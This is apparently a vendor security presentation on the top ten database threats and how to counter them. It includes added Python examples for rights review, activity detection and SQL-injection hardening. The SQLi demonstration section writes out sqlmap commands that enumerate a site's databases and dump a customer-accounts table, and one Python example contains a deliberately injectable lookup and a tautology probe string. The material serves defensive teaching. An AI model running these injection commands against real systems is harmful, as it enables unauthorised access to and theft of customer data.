![Page 1: Top 10 Database Threats - ISACA - Information · PDF file31 . Confidential . Solving the business security problem requires a new protection layer positioned closely around the data](https://reader034.vdocument.in/reader034/viewer/2022051523/5a779b5a7f8b9ad22a8e4e76/html5/thumbnails/1.jpg)
© 2013 Imperva, Inc. All rights reserved.
Top 10 Database Threats
ISACA Charlotte Chapter
Confidential 1
Presented by Eric Gerena
Agenda
Background
Top 10 Database Threats
Neutralizing the Threats
SQLi Attack Demonstration
Q&A
Background
What’s Changed?
Top 10 Database Threats
Are you at risk?
1. Excessive & Unused Privileges
2. Privilege Abuse
3. SQLi (SQL Injection)
4. Malware
5. Weak Audit Trail
6. Storage Media Exposure
7. Database Vulnerability Exploitation
8. Unmanaged Sensitive Data
9. Denial of Service (DoS)
10. Limited Security Expertise & Education
Neutralizing the Threats
Risk Mitigation
How to Neutralize the Threats
Discover, Classify & Assess
User Rights Management
Auditing, Monitoring & Protecting
Data Protection
Non-Technical Security
Discover, Classify & Assess
(diagram: rogue databases; sensitive data classes SSN, Credit Cards, PII; resulting risk)
Discover Active DBs
Discover Rogue DBs
Classify DBs
Vulnerability Assessments
User Rights Management
Reduce Unwarranted Data Access
Map Rights to Individuals
Identify Dormant Accounts
Enforce “Need-to-Know”
Comply
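The four points on this slide (reduce unwarranted access, map rights to individuals, find dormant accounts, enforce need-to-know) are what a periodic rights review automates. The following Python is an added example written for this page, not code from the deck or from Imperva; the account export, roles, tables, owners, dates and the need-to-know policy are constructed, and a real review would read the same data from the database's catalog views.

```python
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional, Set, Tuple

# Added example (not from the Imperva deck): a rights review that maps grants to
# individuals, flags dormant accounts and reports privileges beyond need-to-know.
# Roles, tables, account names and dates below are constructed for the example.

@dataclass
class Account:
    name: str
    owner: Optional[str]            # individual responsible for the account
    role: str                       # job function used for need-to-know mapping
    grants: Dict[str, Set[str]]     # table -> privileges granted
    last_login: Optional[date]      # None means the account has never logged in

# Need-to-know policy: privileges each role legitimately needs per table (constructed).
NEED_TO_KNOW: Dict[str, Dict[str, Set[str]]] = {
    "billing_clerk": {"orders": {"SELECT", "UPDATE"}, "customers": {"SELECT"}},
    "support_agent": {"customers": {"SELECT"}},
    "dba": {
        "orders": {"SELECT", "UPDATE", "DELETE"},
        "customers": {"SELECT", "UPDATE", "DELETE"},
        "legacy_customer_accounts": {"SELECT"},
    },
}

# Tables classified as holding PII (the output of the discover-and-classify step).
SENSITIVE_TABLES = {"customers", "legacy_customer_accounts"}

# Finding = (account, kind, detail, severity)
Finding = Tuple[str, str, str, str]

def review_rights(accounts: List[Account], today: date,
                  dormant_after_days: int = 90) -> List[Finding]:
    """Return findings for dormant, unmapped and over-privileged accounts."""
    findings: List[Finding] = []
    for acct in accounts:
        if acct.last_login is None or (today - acct.last_login).days > dormant_after_days:
            findings.append((acct.name, "dormant",
                             f"last login {acct.last_login}", "medium"))
        if acct.owner is None:
            # A grant that cannot be traced to a person cannot be reviewed or revoked responsibly.
            findings.append((acct.name, "unmapped", "no individual owner", "medium"))
        allowed = NEED_TO_KNOW.get(acct.role, {})
        for table, privs in sorted(acct.grants.items()):
            excess = privs - allowed.get(table, set())
            if excess:
                severity = "high" if table in SENSITIVE_TABLES else "medium"
                findings.append((acct.name, "excessive",
                                 f"{sorted(excess)} on {table}", severity))
    return findings

# Constructed sample export, as a rights-review tool might pull it from catalog views.
TODAY = date(2013, 6, 1)
SAMPLE_ACCOUNTS = [
    Account("jsmith", "Jane Smith", "billing_clerk",
            {"orders": {"SELECT", "UPDATE"}, "customers": {"SELECT"}}, date(2013, 5, 28)),
    Account("rpatel", "Raj Patel", "support_agent",
            {"customers": {"SELECT", "UPDATE", "DELETE"}}, date(2013, 5, 30)),
    Account("app_legacy", None, "support_agent",
            {"legacy_customer_accounts": {"SELECT"}}, date(2012, 11, 1)),
    Account("dba_mk", "Maria Klein", "dba",
            {"orders": {"SELECT", "UPDATE", "DELETE"}, "legacy_customer_accounts": {"SELECT"}},
            date(2013, 5, 31)),
]

if __name__ == "__main__":
    for name, kind, detail, severity in review_rights(SAMPLE_ACCOUNTS, TODAY):
        print(f"{severity:6} {name:12} {kind:10} {detail}")
```

Run as a script it lists four findings: one over-privileged support account, and a dormant, ownerless application account that can still read a PII table. Severity is driven by the classification step, which is why the deck places "Discover, Classify & Assess" before "User Rights Management".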
Auditing, Monitoring & Protecting
(diagram: a query such as UPDATE orders set client 'first ... is flagged as Unusual Activity and an Allow/Block decision is applied; activity sources: Network User, DBAs, Sys Admin)
Real Time Alerting & Blocking
Detect Unusual DB Activity
Monitor Local DB Activity
Impose Connection Controls
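The slide's four bullets map onto detection rules that a database activity monitor evaluates per statement: a mass UPDATE with no WHERE clause (the "unusual activity" in the diagram), reads of classified tables by accounts that are not cleared for them, connections from outside an account's permitted sources, and interactive logins outside business hours. The Python below is an added example written for this page, not code from the deck or from any Imperva product; the audit line format, accounts, addresses, policy and sample lines are all constructed.

```python
import ipaddress
import re
from datetime import datetime
from typing import Dict, List

# Added example (not from the Imperva deck): rule-based detection over database audit
# lines. The log format, accounts, addresses and policy below are constructed.

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) db=(?P<db>\S+) sql="(?P<sql>.*)"$')
TABLE_RE = re.compile(r"\b(?:from|join|update|into)\s+([A-Za-z_]\w*)", re.IGNORECASE)
MASS_CHANGE_RE = re.compile(r"^\s*(?:update|delete)\b", re.IGNORECASE)

SENSITIVE_TABLES = {"legacy_customer_accounts", "customers"}   # classified as PII
SENSITIVE_READERS = {"dba_mk", "billing_svc"}                  # accounts cleared for PII tables
HUMAN_ACCOUNTS = {"jsmith", "dba_mk"}                           # interactive, non-application logins
BUSINESS_HOURS = range(8, 19)                                   # 08:00 to 18:59 local
# Connection controls: where each account may connect from (constructed policy).
ALLOWED_SOURCES = {
    "app_web": [ipaddress.ip_network("10.0.0.20/32")],
    "dba_mk": [ipaddress.ip_network("10.0.1.0/24")],
}

def parse_line(line: str) -> Dict[str, str]:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable audit line: {line!r}")
    return m.groupdict()

def evaluate(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Apply the detection rules to one parsed event; returns zero or more alerts."""
    alerts = []
    sql, user, src = event["sql"], event["user"], event["src"]
    tables = {t.lower() for t in TABLE_RE.findall(sql)}
    # 1. Detect unusual activity: UPDATE/DELETE touching every row of a table.
    if MASS_CHANGE_RE.match(sql) and not re.search(r"\bwhere\b", sql, re.IGNORECASE):
        alerts.append({"rule": "mass_modification", "action": "block"})
    # 2. Reads of classified tables by an account not cleared for them.
    if tables & SENSITIVE_TABLES and user not in SENSITIVE_READERS:
        alerts.append({"rule": "sensitive_access", "action": "block"})
    # 3. Connection controls: the account is connecting from somewhere it should not.
    if user in ALLOWED_SOURCES:
        addr = ipaddress.ip_address(src)
        if not any(addr in net for net in ALLOWED_SOURCES[user]):
            alerts.append({"rule": "source_violation", "action": "block"})
    # 4. Local/interactive DB activity by a person outside business hours: alert only.
    hour = datetime.fromisoformat(event["ts"]).hour
    if user in HUMAN_ACCOUNTS and hour not in BUSINESS_HOURS:
        alerts.append({"rule": "off_hours", "action": "alert"})
    return alerts

def analyze(log_text: str) -> List[Dict[str, object]]:
    """Parse every non-empty audit line and collect the alerts with their line numbers."""
    results: List[Dict[str, object]] = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        event = parse_line(line)
        for a in evaluate(event):
            results.append({"line": n, "user": event["user"], **a})
    return results

# Constructed sample audit lines (not real traffic).
SAMPLE_AUDIT = """\
2013-05-14T09:02:11 user=app_web src=10.0.0.20 db=superveda_db sql="SELECT name, price FROM products WHERE ProdID = 17"
2013-05-14T09:05:42 user=jsmith src=10.0.1.8 db=superveda_db sql="UPDATE orders SET client = 'first' WHERE order_id = 991"
2013-05-14T09:07:03 user=jsmith src=10.0.1.8 db=superveda_db sql="UPDATE orders SET client = 'first'"
2013-05-14T02:13:07 user=dba_mk src=203.0.113.9 db=superveda_db sql="SELECT * FROM Legacy_Customer_Accounts"
2013-05-14T09:10:00 user=app_web src=10.0.0.20 db=superveda_db sql="SELECT * FROM Legacy_Customer_Accounts"
2013-05-14T09:10:01 user=app_web src=10.0.0.20 db=superveda_db sql="SELECT * FROM Legacy_Customer_Accounts WHERE id = 2"
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_AUDIT):
        print(alert)
```

The first two lines are normal and produce nothing; the third is the whole-table UPDATE from the diagram; the fourth shows a legitimate DBA account behaving abnormally (wrong source, 02:13); the last two show the web application's account reading a PII table it never touches in normal operation, which is exactly what an injection through the application would look like on the database side. The rule that reads classified table names only works if the classification step has been done first, and the table-name regex is intentionally simple: a production monitor parses the SQL rather than pattern-matching it.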
Data Protection
Tamper-Proof Audit Trail
Storage Encryption
Non-Technical Security
User Education & Awareness
Cultivate Experienced Security Professionals
Risk Reduction
(chart: counts of Awareness, Audit and Vulnerabilities items per quarter, Q1-2013 through Q4-2013, y-axis 0 to 35)
SQLi Attack Demonstration
It still works!
Anatomy of the Attack
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
So, what tools will be used?
Identify the Vulnerability
Exploit the Vulnerability
Compromi$e the Victim
Commercial Web App Vulnerability Scanner
DB Exploit Tool "SQLMap"
SQLMap Attack Commands
Identify All Databases and Current Database
  ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --dbs
  ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything --current-db
Identify Table(s) of Interest and Associated Columns
  ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db --tables
  ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns
Dump Records from Identified Table and Columns
  ./sqlmap.py -u http://10.0.0.11/proddetails.jsp?ProdID=anything -D superveda_db -T Legacy_Customer_Accounts --columns --dump >> /root/Desktop/SQLi-Attack-Results.txt
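Everything in the demonstration rests on one defect: proddetails.jsp splices the ProdID request parameter into SQL text. The Python below is an added example written for this page, not code from the deck or from the demonstrated application; it recreates that lookup against a constructed in-memory SQLite table, first the injectable way and then with a bound parameter plus an allow-list on the parameter's format (the product table, rows and the "P" + three digits format are constructed). The point for a defender is the row counts: the same input that changes the statement's structure under concatenation is just an unmatched literal once it is bound.

```python
import re
import sqlite3
from typing import Dict, List, Tuple, Union

# Added example (not from the Imperva deck): a product lookup keyed by a ProdID request
# parameter, written first the injectable way and then the hardened way. The table,
# product rows and ProdID format are constructed for the example.

Row = Tuple[str, str, float]

def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (ProdID TEXT PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [("P100", "Widget", 9.99), ("P200", "Gadget", 19.99), ("P300", "Gizmo", 29.99)])
    conn.commit()
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, prod_id: str) -> List[Row]:
    # Deliberately injectable: the parameter is spliced into the SQL text, so quote
    # characters in the input change the statement's structure instead of its data.
    sql = "SELECT ProdID, name, price FROM products WHERE ProdID = '" + prod_id + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, prod_id: str) -> List[Row]:
    # The driver passes the value separately from the statement; it can only ever be
    # compared as a literal, whatever characters it contains.
    return conn.execute(
        "SELECT ProdID, name, price FROM products WHERE ProdID = ?", (prod_id,)).fetchall()

PROD_ID_FORMAT = re.compile(r"P\d{3}")   # constructed allow-list for the parameter

def lookup_hardened(conn: sqlite3.Connection, prod_id: str) -> List[Row]:
    # Defence in depth: reject input that does not look like a product id before it
    # reaches the database at all, then bind it as a parameter.
    if not PROD_ID_FORMAT.fullmatch(prod_id):
        raise ValueError("ProdID does not match the expected format")
    return lookup_parameterized(conn, prod_id)

# Constructed probe input: a closing quote followed by a tautology, the kind of
# malformed value a scanner sends to test whether the parameter is interpreted as SQL.
TAUTOLOGY = "anything' OR '1'='1"

def compare(prod_id: str) -> Dict[str, Union[int, str]]:
    """Run one input through all three lookups and report how many rows each returns."""
    conn = setup_db()
    out: Dict[str, Union[int, str]] = {
        "vulnerable": len(lookup_vulnerable(conn, prod_id)),
        "parameterized": len(lookup_parameterized(conn, prod_id)),
    }
    try:
        out["hardened"] = len(lookup_hardened(conn, prod_id))
    except ValueError:
        out["hardened"] = "rejected"
    return out

if __name__ == "__main__":
    print("P100     ->", compare("P100"))
    print("tautology->", compare(TAUTOLOGY))
```

A legitimate id returns one row from all three functions. The probe input returns every row from the concatenated version (the condition became `ProdID = 'anything' OR '1'='1'`), zero rows from the parameterized version, and is rejected before reaching the database by the hardened one. The allow-list is a second layer, not a substitute for binding: parameters are what make the fix hold for every input, including ones no regex anticipated.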
Off to the Black Market!
Imperva
Data Security Solutions
Imperva Highlights
About Imperva
• Founded: 2002
• CEO: Shlomo Kramer, Co-Founder of Check Point
• HQ in Redwood Shores, CA
• 1,800+ customers; 25,000+ organizations
• Customers in 50+ countries
The Problems We Solve
• Protecting the Data that Drives Business
• Maintaining Regulatory Compliance
Company Highlights
• 480+ Employees
• $104M in Revenue
• $48M Deferred Revenue
• Cash & CE: $102M
• Publicly Traded: IMPV
(chart: revenue 2010 through 2013, 33% YoY Growth)
The Solution
Solving the business security problem requires a new protection layer positioned closely around the data and applications in the data center
(diagram) Actors: External Customers, Staff, Partners, Hackers; Internal Employees, Malicious Insiders, Compromised Insiders; Data Center Systems and Admins
Protection layer: Tech. Attack Protection, Logic Attack Protection, Fraud Prevention, Usage Audit, User Rights Management, Access Control
IMPERVA’S MISSION IS TO PROVIDE A COMPLETE SOLUTION
Databases - Coverage
Coverage for Heterogeneous Databases
DB2 DB2 z/OS DB2400 Informix Netezza
Web Scanner Integration
Thank You
Imperva Data Security Solutions